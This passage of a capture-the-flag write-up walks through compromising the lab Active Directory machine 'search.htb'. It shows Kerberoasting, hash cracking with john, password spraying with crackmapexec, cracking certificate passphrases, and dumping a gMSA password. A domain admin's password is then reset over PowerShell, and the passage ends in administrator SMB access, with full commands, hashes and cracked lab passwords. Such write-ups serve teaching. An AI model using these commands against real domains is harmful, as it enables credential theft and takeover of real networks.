\hope.sharp\Desktop
  .                                 DRc        0  Thu Apr  9 10:35:49 2020
  ..                                DRc        0  Thu Apr  9 10:35:49 2020
  $RECYCLE.BIN                     DHSc        0  Thu Apr  9 10:35:49 2020
  desktop.ini                      AHSc      282  Thu Apr  9 10:35:00 2020
  Microsoft Edge.lnk                 Ac     1450  Thu Apr  9 10:35:38 2020

\hope.sharp\Documents
  .                                 DRc        0  Thu Apr  9 10:35:50 2020
  ..                                DRc        0  Thu Apr  9 10:35:50 2020
  $RECYCLE.BIN                     DHSc        0  Thu Apr  9 10:35:51 2020
  desktop.ini                      AHSc      402  Thu Apr  9 10:35:03 2020

\hope.sharp\Downloads
  .                                 DRc        0  Thu Apr  9 10:35:49 2020
  ..                                DRc        0  Thu Apr  9 10:35:49 2020
  $RECYCLE.BIN                     DHSc        0  Thu Apr  9 10:35:49 2020
  desktop.ini                      AHSc      282  Thu Apr  9 10:35:02 2020

\jayla.roberts\Desktop
NT_STATUS_ACCESS_DENIED listing \jayla.roberts\Desktop\*

...

\Savanah.Velazquez\Downloads
NT_STATUS_ACCESS_DENIED listing \Savanah.Velazquez\Downloads\*

\sierra.frye\Desktop
  .                                 DRc        0  Wed Nov 17 20:08:00 2021
  ..                                DRc        0  Wed Nov 17 20:08:00 2021
  $RECYCLE.BIN                     DHSc        0  Tue Apr  7 14:03:59 2020
  desktop.ini                      AHSc      282  Fri Jul 31 10:42:15 2020
  Microsoft Edge.lnk                 Ac     1450  Tue Apr  7 08:28:05 2020
  user.txt                           Ac       33  Wed Nov 17 19:55:27 2021

\sierra.frye\Documents
NT_STATUS_ACCESS_DENIED listing \sierra.frye\Documents\*

\sierra.frye\Downloads
NT_STATUS_ACCESS_DENIED listing \sierra.frye\Downloads\*

\trace.ryan\Desktop
NT_STATUS_ACCESS_DENIED listing \trace.ryan\Desktop\*

\trace.ryan\Documents
NT_STATUS_ACCESS_DENIED listing \trace.ryan\Documents\*

\trace.ryan\Downloads
NT_STATUS_ACCESS_DENIED listing \trace.ryan\Downloads\*

\hope.sharp\Desktop\$RECYCLE.BIN
  .                                DHSc        0  Thu Apr  9 10:35:49 2020
  ..                               DHSc        0  Thu Apr  9 10:35:49 2020
  desktop.ini                      AHSc      129  Thu Apr  9 10:35:49 2020

\hope.sharp\Documents\$RECYCLE.BIN
  .                                DHSc        0  Thu Apr  9 10:35:51 2020
  ..                               DHSc        0  Thu Apr  9 10:35:51 2020
  desktop.ini                      AHSc      129  Thu Apr  9 10:35:51 2020

\hope.sharp\Downloads\$RECYCLE.BIN
  .                                DHSc        0  Thu Apr  9 10:35:49 2020
  ..                               DHSc        0  Thu Apr  9 10:35:49 2020
  desktop.ini                      AHSc      129  Thu Apr  9 10:35:50 2020

\sierra.frye\Desktop\$RECYCLE.BIN
  .                                DHSc        0  Tue Apr  7 14:03:59 2020
  ..                               DHSc        0  Tue Apr  7 14:03:59 2020
  desktop.ini                      AHSc      129  Tue Apr  7 14:04:00 2020
smb: \> get sierra.frye\Desktop\user.txt
NT_STATUS_ACCESS_DENIED opening remote file \sierra.frye\Desktop\user.txt

All of this leads to nowhere except that we know ‘sierra.frye’ has the user flag, so this user is probably the next step to a lateral movement.

Kerberoasting

Given the users we got from enum4linux, let's use it and attempt to get the SPN tickets:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ impacket-GetUserSPNs -request -usersfile dom_userlist.txt -dc-ip research.search.htb 'search.htb/hope.sharp:IsolationIsKey?' 
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] Principal: Administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$krbtgt$SEARCH.HTB$*krbtgt*$0820014f34b455d3c07b50dd$98d076c059a11e9b8f0995e1fe065a5965a3053317321fc1ca2c82136a129aa1ead67b05196d537eec67e44e9a035862e7e5f3c3bace1ecc3f6ee096d61053ca55496b16c5d39043c4801b7fd931d0598fbe4dbc14552cd71ac1928a833ae045ebf4abef2cf7bc8a4bc00a58309a7548018d28882818dd446349e4c712cf0c05a191f0f2ceb3f60674fb5202f9cf7e7fa23241ff97f8a6c19f7d6ad9b98502f064987d79cf21c3c55ea52d4ead445c87f21a7ebbe8349ae8e05330e7d5cb40150435b707e28b17b4024e09ee16e12d38b6c921d9f6d90ecef10a1aedc505180fc1b6873efd76fcdc7069bb11f4675912964039229fa988b80225afc77fd93eea180f59b639f4dc9fa99d47aa40ccc77ce665a543239007cac7ebd53d055dc28e89c6694727f978577ac2b7076854aacb7b6e308ab1012023db472f36a7f393adae99d12e34be65ad854e47dabbae6c7f0c505e46cc0bebbbc3e0717b9f4cf567b0b830521d76670ea1ef6ed843db43918ece9e1c0bab07000d09ed800f07edf2a2d78cdb147778ff248c2a159eceecd89cfd362b9edb083d74f66afbc29459915ba431cd4a837dd790bd8f7ef3dd67c0f697ad816c14eb1542b14390fd79a486788894827098f191aa54b0c85d33af817e17d9baaf3556bb006b521ba7c99f7e4e11e4ce09a773bc43eb8ffba1053fa24dbc05d0f600d75e4b298115ff2820538ac1e6f7b6611b5e46f95e81985d326a0b51333b591564e898a1bb3e8fb2f9a27744d737b80291179d931329986748166798e861e552470514756cfc9395fcd55294f2a096a0f1a915985e6691fbd95e10b834ea39de65b296d75f6dedf5a062cac4407ab427a9ab2729c83e866af231daefd1451af59bfe798f0202a891aac9c630bbcf5ca8f68023caf8cb1cd2eea3d8cbd071580692b26de02dd13023dd4be4a47c9449f8d2596bc432a49781e50b15d72eca74bb8d8e81ce24895709adde79cc4488ae29a6f1fdb5e2f5e57192a8138b4df17e81a4df74ee64529b00b6ae83519b92da8ec0f479b294caf6fe885ec48db5c52e953e98e9358f4901f463b0ff47915523ccb4fc7d67d5b4e658518932236340b25c5f0b6fd51072f27a06de333f65737ac0db2cfd3c0d2681e6bb1f59daebf75f3d8e5a380bdc9eecbfe83e28e7ebbd3267401c56888fbdba265aeb9ff9dd005355e07648583996fdcf83783cb5701bdbaf45790467859b6b6dcee02e4a3bb5c318fa666230605fa228a500a239c1113ceb8171609a24d657f8c91403c9622c209577db4cbf8c7a45015f2e2fe174e2ce47ca0d2baec84fa3999fe2f8e750167cf3bff4348fcf03b2a853e72d261b40765427a4ecf0bb2355f8dd94a18bbe20e304cc012a01e9e9c43de198f23e4174ddc582ad4330fbdc4047dbd341be0daaa778dc81b88df83d16d580d7f675e9d173dafeb4df97da79c352cc9936c560d760806071bf7cdce872975c58eed1bf1777dae42ebdb177ffe691febb74fd5000502b272c4c2f292488
[-] Principal: Santino.Benjamin - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
...
[-] Principal: Jordan.Gregory - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*web_svc$SEARCH.HTB$web_svc*$04c3e36f83a5b31eb7372497c08833db$7cc4bec06406f0d77106c29ad0801fc3d3b4109e49bd6df91628324f50f58a3f957bd9606144bce79981b7d56693e547fa5eabdd53dcc1cac8695412ddb6ddf4b6b6448fe8ae274701768ff640d287002ed28efd18e3343ecabb2670e1856ea481ea45f7a399d334fdd1304d6b15b8c9337cd606500f61ce539d142697613920bced58d974fd9afbea0d3e2c6f8ea808559d3a2957dceadb619d21e3be3677d6b4acfb989561cc2420a99eb7f3ec12b318cd260cc8e5dcfb04266e03a6860c0d625d06b4a76d9a30c768a36fe92079930509d371b5d3867508b6689aaacc6e5bf4036d9de8170752207606352c8d57eb646a25d2d4a8abd0ae4c3597cb008256de9aac3269fb3ca1aa2e416661ee3bea1b019b804710d8c1f9b266679ca914abadcf9d71f66e42e8debdca33b26cbb4c865b2f57543e5b55f5406469ba0830e6890fa7c228448003812f4adb00de86b5c9b2d708323cc2f55609cab06a0b0bbad4079f931a210bebb6adf67899dc3ca773b36840e9fc25a14ab7ec21061f5701f005704661fbf3f588bbfc2a2b12b293a72aa3ffb1680048f6c77b494bf6b0e3a212d341964fcc8cc5d99081a3b5bf0f2f687b967fa87a20ad8fd9a7c9e910612c316a3d0a8494f230cfdef0ab26e6d3809bcb4f65ea601d6200b8f62a2018b422bcafe1a6324ec2102a3852d1a7778695081664c91a632a50b0f159e5b77b5be26832b6724a8f7b1334c87e217767d1963fe565b658b965cf97caf492f530b5ec3789ad31985d3446c5739e3d515d197bdf1a6e238facec5054a262e8706a9fe840a797ecfc10ae7e4a90cd4604dbe24ae13890ef6e8e84d62ca319ad546d73e7ec22c99a50c6210582c7d712783a541e47bc3b83203ce2c2a15419f187700e2f9e258a306749bd51c8be6dc72722a477687d8176e2ff205bbc467cdaa55c2d2d0c51ffde190e302e4ca58acd42f907b8bc8efd01332ddbd91910e34fd3ceac6bad7eb5cfc517b70e0428a25cedbce8155e511b365d3d21634ef10352fecb2b5aa22f0ddf0ad4ee4841d104b7f01a27d0e7e3c3816cb0255ee6833a37352d2e6961e24c6fd120fc8b082aff3ffc25cac65449527b153abc1500666d236d49c3a0238239a1282ac6750a6519fad5d909566692f21fd819a81674e6bf85253200f3a88a8faf2eb3c766058b3c25b8d3aa300a91b138401f315b2b5e79094fadc78871eacc8182e6a3e26a3bcb5273bbcca0a0cd88b88ff7355e656e76ba6d5cf7bb62661b77296ff203712c7d46622e6a0dc6d9a38c390a82a7efe27380ff75ac0936fbae297c7fd9830312a92adeebbf95341fbe53fce4ce55a27fb0e95795e6d5fa3fac26a34de0cb63eec71c07f56cd3efef4e239649a67359f37713d9ed94199e8df3026bfb9418af9927d92b7ce84cda6bffd7960afcffbc96fcd62e2e3fce79c1a76710433ae71ef70b90a9a6baa5d469b2f8
[-] Principal: Tristan.Davies - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal:  - Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

Now with the SPN ticket for web_svc, let's try and crack this:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ echo '$krb5tgs$23$*web_svc$SEARCH.HTB$web_svc*$04c3e36f83a5b31eb7372497c08833db$7cc4bec06406f0d77106c29ad0801fc3d3b4109e49bd6df91628324f50f58a3f957bd9606144bce79981b7d56693e547fa5eabdd53dcc1cac8695412ddb6ddf4b6b6448fe8ae274701768ff640d287002ed28efd18e3343ecabb2670e1856ea481ea45f7a399d334fdd1304d6b15b8c9337cd606500f61ce539d142697613920bced58d974fd9afbea0d3e2c6f8ea808559d3a2957dceadb619d21e3be3677d6b4acfb989561cc2420a99eb7f3ec12b318cd260cc8e5dcfb04266e03a6860c0d625d06b4a76d9a30c768a36fe92079930509d371b5d3867508b6689aaacc6e5bf4036d9de8170752207606352c8d57eb646a25d2d4a8abd0ae4c3597cb008256de9aac3269fb3ca1aa2e416661ee3bea1b019b804710d8c1f9b266679ca914abadcf9d71f66e42e8debdca33b26cbb4c865b2f57543e5b55f5406469ba0830e6890fa7c228448003812f4adb00de86b5c9b2d708323cc2f55609cab06a0b0bbad4079f931a210bebb6adf67899dc3ca773b36840e9fc25a14ab7ec21061f5701f005704661fbf3f588bbfc2a2b12b293a72aa3ffb1680048f6c77b494bf6b0e3a212d341964fcc8cc5d99081a3b5bf0f2f687b967fa87a20ad8fd9a7c9e910612c316a3d0a8494f230cfdef0ab26e6d3809bcb4f65ea601d6200b8f62a2018b422bcafe1a6324ec2102a3852d1a7778695081664c91a632a50b0f159e5b77b5be26832b6724a8f7b1334c87e217767d1963fe565b658b965cf97caf492f530b5ec3789ad31985d3446c5739e3d515d197bdf1a6e238facec5054a262e8706a9fe840a797ecfc10ae7e4a90cd4604dbe24ae13890ef6e8e84d62ca319ad546d73e7ec22c99a50c6210582c7d712783a541e47bc3b83203ce2c2a15419f187700e2f9e258a306749bd51c8be6dc72722a477687d8176e2ff205bbc467cdaa55c2d2d0c51ffde190e302e4ca58acd42f907b8bc8efd01332ddbd91910e34fd3ceac6bad7eb5cfc517b70e0428a25cedbce8155e511b365d3d21634ef10352fecb2b5aa22f0ddf0ad4ee4841d104b7f01a27d0e7e3c3816cb0255ee6833a37352d2e6961e24c6fd120fc8b082aff3ffc25cac65449527b153abc1500666d236d49c3a0238239a1282ac6750a6519fad5d909566692f21fd819a81674e6bf85253200f3a88a8faf2eb3c766058b3c25b8d3aa300a91b138401f315b2b5e79094fadc78871eacc8182e6a3e26a3bcb5273bbcca0a0cd88b88ff7355e656e76ba6d5cf7bb62661b77296ff203712c7d46622e6a0dc6d9a38c390a82a7efe27380ff75ac0936fbae297c7fd9830312a92adeebbf95341fbe53fce4ce55a27fb0e95795e6d5fa3fac26a34de0cb63eec71c07f56cd3efef4e239649a67359f37713d9ed94199e8df3026bfb9418af9927d92b7ce84cda6bffd7960afcffbc96fcd62e2e3fce79c1a76710433ae71ef70b90a9a6baa5d469b2f8' > web_svc-krb
                                                                                   
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ john --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt web_svc-krb 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
@3ONEmillionbaby (?)     
1g 0:00:00:11 DONE (2022-04-22 14:52) 0.08960g/s 1029Kp/s 1029Kc/s 1029KC/s @4208891ncv..@#alexandra$&
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Once we cracked this SPN ticket, we had no success as it has the "same level of access" as hope.sharp. Let's attempt to use it for password spraying and see if an account has that same password:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ crackmapexec smb search.htb -d SEARCH -u dom_userlist.txt -p '@3ONEmillionbaby' --continue-on-success
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:SEARCH) (signing:True) (SMBv1:False)
SMB         search.htb      445    RESEARCH         [-] SEARCH\Administrator:@3ONEmillionbaby STATUS_LOGON_FAILURE 
...
SMB         search.htb      445    RESEARCH         [-] SEARCH\Marshall.Skinner:@3ONEmillionbaby STATUS_LOGON_FAILURE 
SMB         search.htb      445    RESEARCH         [+] SEARCH\Edgar.Jacobs:@3ONEmillionbaby 
SMB         search.htb      445    RESEARCH         [-] SEARCH\Elisha.Watts:@3ONEmillionbaby STATUS_LOGON_FAILURE
...
SMB         search.htb      445    RESEARCH         [-] SEARCH\:@3ONEmillionbaby STATUS_LOGON_FAILURE

We found another user with the same password as web_svc: Edgar.Jacobs:@3ONEmillionbaby

Let's see what can we see with this account:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbmap -H search.htb -u 'edgar.jacobs' -p '@3ONEmillionbaby' -d SEARCH 
[+] IP: search.htb:445	Name: unknown                                           
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	CertEnroll                                        	READ ONLY	Active Directory Certificate Services share
	helpdesk                                          	READ ONLY	
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	RedirectedFolders$                                	READ, WRITE	
	SYSVOL                                            	READ ONLY	Logon server share 
                                                                                                                                                                         

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbclient //search.htb/RedirectedFolders$ -U 'SEARCH\edgar.jacobs'%'@3ONEmillionbaby'
Try "help" to get a list of possible commands.
smb: \> cd edgar.jacobs\
smb: \edgar.jacobs\> ls
  .                                  Dc        0  Thu Apr  9 16:04:11 2020
  ..                                 Dc        0  Thu Apr  9 16:04:11 2020
  Desktop                           DRc        0  Mon Aug 10 06:02:16 2020
  Documents                         DRc        0  Mon Aug 10 06:02:17 2020
  Downloads                         DRc        0  Mon Aug 10 06:02:17 2020

		3246079 blocks of size 4096. 374459 blocks available
smb: \edgar.jacobs\> ls Desktop\
  .                                 DRc        0  Mon Aug 10 06:02:16 2020
  ..                                DRc        0  Mon Aug 10 06:02:16 2020
  $RECYCLE.BIN                     DHSc        0  Thu Apr  9 16:05:29 2020
  desktop.ini                      AHSc      282  Mon Aug 10 06:02:16 2020
  Microsoft Edge.lnk                 Ac     1450  Thu Apr  9 16:05:03 2020
  Phishing_Attempt.xlsx              Ac    23130  Mon Aug 10 06:35:44 2020

		3246079 blocks of size 4096. 374459 blocks available
smb: \edgar.jacobs\> cd ..
smb: \> get edgar.jacobs\Desktop\Phishing_Attempt.xlsx 
getting file \edgar.jacobs\Desktop\Phishing_Attempt.xlsx of size 23130 as edgar.jacobs\Desktop\Phishing_Attempt.xlsx (124.8 KiloBytes/sec) (average 124.8 KiloBytes/sec)
smb: \> quit

As you get to see, there is a "phishing" related spreadsheet we need to inspect and for this I did not go fancy and simply used Google Sheets:

This is what seems to be a good password list to work with and test them out once more after composing a new list:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ crackmapexec smb search.htb -d SEARCH -u phishUser -p phishPass --continue-on-success     
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:SEARCH) (signing:True) (SMBv1:False)
SMB         search.htb      445    RESEARCH         [-] SEARCH\Payton.Harmon:;;36!cried!INDIA!year!50;; STATUS_LOGON_FAILURE 
...
SMB         search.htb      445    RESEARCH         [-] SEARCH\Sierra.Frye:~~27%when%VILLAGE%full%00~~ STATUS_LOGON_FAILURE 
SMB         search.htb      445    RESEARCH         [+] SEARCH\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18 
SMB         search.htb      445    RESEARCH         [-] SEARCH\Sierra.Frye:==95~pass~QUIET~austria~77== STATUS_LOGON_FAILURE 
...
SMB         search.htb      445    RESEARCH         [-] SEARCH\Vincent.Sutton:**24&moment&BRAZIL&members&66** STATUS_LOGON_FAILURE

And we just found the following: SEARCH\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18

Let's attempt to use this account while first testing it through smbmap:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbmap -H search.htb -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d SEARCH     
[+] IP: search.htb:445	Name: unknown                                           
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	CertEnroll                                        	READ ONLY	Active Directory Certificate Services share
	helpdesk                                          	NO ACCESS	
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	RedirectedFolders$                                	READ, WRITE	
	SYSVOL                                            	READ ONLY	Logon server share 

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbclient //search.htb/RedirectedFolders$ -U 'SEARCH\Sierra.Frye'%'$$49=wide=STRAIGHT=jordan=28$$18'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  Dc        0  Fri Apr 22 17:00:50 2022
  ..                                 Dc        0  Fri Apr 22 17:00:50 2022
  abril.suarez                       Dc        0  Tue Apr  7 14:12:58 2020
  Angie.Duffy                        Dc        0  Fri Jul 31 09:11:32 2020
  Antony.Russo                       Dc        0  Fri Jul 31 08:35:32 2020
  belen.compton                      Dc        0  Tue Apr  7 14:32:31 2020
  Cameron.Melendez                   Dc        0  Fri Jul 31 08:37:36 2020
  chanel.bell                        Dc        0  Tue Apr  7 14:15:09 2020
  Claudia.Pugh                       Dc        0  Fri Jul 31 09:09:08 2020
  Cortez.Hickman                     Dc        0  Fri Jul 31 08:02:04 2020
  dax.santiago                       Dc        0  Tue Apr  7 14:20:08 2020
  Eddie.Stevens                      Dc        0  Fri Jul 31 07:55:34 2020
  edgar.jacobs                       Dc        0  Thu Apr  9 16:04:11 2020
  Edith.Walls                        Dc        0  Fri Jul 31 08:39:50 2020
  eve.galvan                         Dc        0  Tue Apr  7 14:23:13 2020
  frederick.cuevas                   Dc        0  Tue Apr  7 14:29:22 2020
  hope.sharp                         Dc        0  Thu Apr  9 10:34:41 2020
  jayla.roberts                      Dc        0  Tue Apr  7 14:07:00 2020
  Jordan.Gregory                     Dc        0  Fri Jul 31 09:01:06 2020
  payton.harmon                      Dc        0  Thu Apr  9 16:11:39 2020
  Reginald.Morton                    Dc        0  Fri Jul 31 07:44:32 2020
  santino.benjamin                   Dc        0  Tue Apr  7 14:10:25 2020
  Savanah.Velazquez                  Dc        0  Fri Jul 31 08:21:42 2020
  sierra.frye                        Dc        0  Wed Nov 17 20:01:46 2021
  trace.ryan                         Dc        0  Thu Apr  9 16:14:26 2020

		3246079 blocks of size 4096. 374322 blocks available
smb: \> recurse 
smb: \> ls sierra.frye\
  .                                  Dc        0  Wed Nov 17 20:01:46 2021
  ..                                 Dc        0  Wed Nov 17 20:01:46 2021
  Desktop                           DRc        0  Wed Nov 17 20:08:00 2021
  Documents                         DRc        0  Fri Jul 31 10:42:19 2020
  Downloads                         DRc        0  Fri Jul 31 10:45:36 2020
  user.txt                           Ac       33  Wed Nov 17 19:55:27 2021

\sierra.frye\Desktop
  .                                 DRc        0  Wed Nov 17 20:08:00 2021
  ..                                DRc        0  Wed Nov 17 20:08:00 2021
  $RECYCLE.BIN                     DHSc        0  Tue Apr  7 14:03:59 2020
  desktop.ini                      AHSc      282  Fri Jul 31 10:42:15 2020
  Microsoft Edge.lnk                 Ac     1450  Tue Apr  7 08:28:05 2020
  user.txt                          ARc       34  Fri Apr 22 09:32:25 2022

\sierra.frye\Documents
  .                                 DRc        0  Fri Jul 31 10:42:19 2020
  ..                                DRc        0  Fri Jul 31 10:42:19 2020
  $RECYCLE.BIN                     DHSc        0  Tue Apr  7 14:04:01 2020
  desktop.ini                      AHSc      402  Fri Jul 31 10:42:19 2020

\sierra.frye\Downloads
  .                                 DRc        0  Fri Jul 31 10:45:36 2020
  ..                                DRc        0  Fri Jul 31 10:45:36 2020
  $RECYCLE.BIN                     DHSc        0  Tue Apr  7 14:04:01 2020
  Backups                           DHc        0  Mon Aug 10 16:39:17 2020
  desktop.ini                      AHSc      282  Fri Jul 31 10:42:18 2020

\sierra.frye\Desktop\$RECYCLE.BIN
  .                                DHSc        0  Tue Apr  7 14:03:59 2020
  ..                               DHSc        0  Tue Apr  7 14:03:59 2020
  desktop.ini                      AHSc      129  Tue Apr  7 14:04:00 2020

\sierra.frye\Documents\$RECYCLE.BIN
  .                                DHSc        0  Tue Apr  7 14:04:01 2020
  ..                               DHSc        0  Tue Apr  7 14:04:01 2020
  desktop.ini                      AHSc      129  Tue Apr  7 14:04:01 2020

\sierra.frye\Downloads\$RECYCLE.BIN
  .                                DHSc        0  Tue Apr  7 14:04:01 2020
  ..                               DHSc        0  Tue Apr  7 14:04:01 2020
  desktop.ini                      AHSc      129  Tue Apr  7 14:04:01 2020

\sierra.frye\Downloads\Backups
  .                                 DHc        0  Mon Aug 10 16:39:17 2020
  ..                                DHc        0  Mon Aug 10 16:39:17 2020
  search-RESEARCH-CA.p12             Ac     2643  Fri Jul 31 11:04:11 2020
  staff.pfx                          Ac     4326  Mon Aug 10 16:39:17 2020

		3246079 blocks of size 4096. 374322 blocks available
smb: \> cd sierra.frye\Desktop\
smb: \sierra.frye\Desktop\> get user.txt 
getting file \sierra.frye\Desktop\user.txt of size 34 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \sierra.frye\Desktop\> cd ..\Downloads\Backups\
smb: \sierra.frye\Downloads\Backups\> get search-RESEARCH-CA.p12 
getting file \sierra.frye\Downloads\Backups\search-RESEARCH-CA.p12 of size 2643 as search-RESEARCH-CA.p12 (15.0 KiloBytes/sec) (average 7.5 KiloBytes/sec)
smb: \sierra.frye\Downloads\Backups\> get staff.pfx 
getting file \sierra.frye\Downloads\Backups\staff.pfx of size 4326 as staff.pfx (25.0 KiloBytes/sec) (average 13.2 KiloBytes/sec)
smb: \sierra.frye\Downloads\Backups\> quit

At this point, not only we found the user flag without a shell but we also found a PKCS12 certificate file (PFX file).

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ cat user.txt 
ab0459********************bea8e6

While trying to see the content of this certificate file, we cannot as it seems to have been created with a passphrase to decrypt the private key.

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ openssl pkcs12 -info -in staff.pfx 
Enter Import Password:
Can't read Password
                                                                                   
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ pfx2john staff.pfx > staff_pfx
                                                                                   
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ john --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt staff_pfx
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
misspissy        (staff.pfx)     
1g 0:00:03:39 DONE (2022-04-22 17:16) 0.004549g/s 24952p/s 24952c/s 24952C/s misssnail..missnona16
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ pfx2john search-RESEARCH-CA.p12 > search_p12

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ john --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt search_p12
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
misspissy        (search-RESEARCH-CA.p12)     
1g 0:00:03:41 DONE (2022-04-22 17:24) 0.004518g/s 24782p/s 24782c/s 24782C/s misssnail..missnona16
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

To use these certificate files, you will have to import them into the browser.

This will give us a Powershell session on the browser. Here we will try to get and change the Execution Policy and load PowerView into memory for future use:

Privilege Escalation

While enumerating directories we bump into a Home directory from what seems to be a group managed service account (GMSA):

PS C:\users> ls

    Directory: C:\users


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        3/23/2020   7:20 AM                .NET v4.5                                                             
d-----        3/23/2020   7:20 AM                .NET v4.5 Classic                                                     
d-----       12/20/2021   8:34 AM                Administrator                                                         
d-----        7/31/2020  10:01 AM                BIR-ADFS-GMSA$                                                        
d-r---        3/23/2020   7:07 AM                Public                                                                
d-----        4/23/2022   4:23 AM                Sierra.Frye                                                           
d-----        8/11/2020   8:45 AM                WSEnrollmentServer                                                    

PS C:\users>

Bloodhound

With this account, we should try and enumerate the domain a little more using Bloodhound:

Using the 'Shortest PAth to Domain Admins, we can see that 'Sierra'Frye', through the inherited rights from the ITSEC group, can read the gMSA password from BIR-ADFS-GMSA. This service account has the 'Generic All' rights against 'Tristan.Davies', a domain admin, which means the account can be modified.

When we try to dump the gMSA password with Sierra.Frye we get such hash:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ python3 /opt/gMSADumper/gMSADumper.py -l search.htb -d search.htb -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18'
Users or groups who can read password for BIR-ADFS-GMSA$:
 > ITSec
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f

Back to Powershell, we will try to use the 'ManagedPassword' and change Tristan.Davies password:

PS C:\users> Get-ADServiceAccount -Identity BIR-ADFS-GMSA$ -Properties 'msDS-ManagedPassword'


DistinguishedName    : CN=BIR-ADFS-GMSA,CN=Managed Service Accounts,DC=search,DC=htb
Enabled              : True
msDS-ManagedPassword : {1, 0, 0, 0...}
Name                 : BIR-ADFS-GMSA
ObjectClass          : msDS-GroupManagedServiceAccount
ObjectGUID           : 48cd6c5b-56cb-407e-ac2b-7294b5a44857
SamAccountName       : BIR-ADFS-GMSA$
SID                  : S-1-5-21-271492789-1610487937-1871574529-1299
UserPrincipalName    : 
 

PS C:\users> $gMSA = Get-ADServiceAccount -Identity BIR-ADFS-GMSA$ -Properties 'msDS-ManagedPassword'
PS C:\users> $data = $gMSA.'msDS-ManagedPassword'
PS C:\users> $pass = ConvertFrom-ADManagedPasswordBlob $data
PS C:\users> $user = 'BIR-ADFS-GMSA$'
PS C:\users> $creds = New-Object System.Management.Automation.PSCredential $user,$pass.SecureCurrentPassword
PS C:\users> Invoke-Command -ComputerName localhost -Credential $creds -ScriptBlock {net user Tristan.Davies test /domain}
The password does not meet the password policy requirements. Check the minimum password length, password complexity 
and password history requirements.
    + CategoryInfo          : NotSpecified: (The password do...y requirements.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
    + PSComputerName        : localhost

NotSpecified: (:String) [], RemoteException
More help is available by typing NET HELPMSG 2245.
NotSpecified: (:String) [], RemoteException

PS C:\users> Invoke-Command -ComputerName localhost -Credential $creds -ScriptBlock {net user Tristan.Davies test1234 /domain}
The command completed successfully.

PS C:\users>

Lateral Movement

Having changed the password on Tristan.Davies, we can now access the account with no issues.

Accessing the system through SMB:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbclient //search.htb/C$ -U 'SEARCH/Tristan.Davies%test1234'
Try "help" to get a list of possible commands.
smb: \> pwd
Current directory is \\search.htb\C$\
smb: \> cd Users\Administrator\
smb: \Users\Administrator\> ls
